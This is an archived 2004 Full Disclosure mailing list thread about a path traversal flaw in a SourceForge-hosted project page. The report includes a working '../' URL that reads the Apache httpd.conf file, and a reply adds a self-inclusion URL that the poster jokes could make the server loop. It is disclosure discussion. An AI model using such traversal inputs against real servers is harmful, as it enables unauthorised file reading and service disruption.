Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

RE: Vulnerability in sourceforge.net
From: "Andrew Poodle" <andrewp () IRW co uk>
Date: Wed, 21 Jul 2004 15:09:45 +0100

Don't even think about trying this then...

http://btmgr.sourceforge.net/index.php3?body=../../../../../../home/groups/b/bt/btmgr/htdocs/index.php3

Don't want to crash sourceforge by getting it into an infinite loop now do we?

a

-----Original Message-----
From: full-disclosure-admin () lists netsys com
[mailto:full-disclosure-admin () lists netsys com]On Behalf Of nicolas
vigier
Sent: 21 July 2004 09:00
To: Alexander
Cc: full-disclosure () lists netsys com
Subject: Re: [Full-disclosure] Vulnerability in sourceforge.net


On Wed, 21 Jul 2004, Alexander wrote:

Vulnerability in sourceforge.net.

Remote user can read any files. Example:

Any file the webserver account can read.


http://btmgr.sourceforge.net/index.php3?body=../../../../../..
/usr/local
/apache/conf/httpd.conf

This is not a vulnerability in sourceforge, but in on of the project's
webpage. And anyone with a project on sourceforge can read the same
files using his webspace.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


This document should only be read by those persons to whom it is addressed and is not intended to be relied upon by any 
person without subsequent written confirmation of its contents. 
Accordingly  IRW  Solutions Group Ltd  disclaim all responsibility and accept no liability (including in negligence) 
for the consequences for any person acting, or refraining from acting, on such information prior to the receipt by 
those persons of subsequent written confirmation. 

If you have received this e-mail message in error, please notify us immediately. 
Please also destroy and delete the message from your computer. 

Any form of reproduction, dissemination, copying, disclosure, modification, distribution and/or publication of this 
e-mail message is strictly prohibited.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault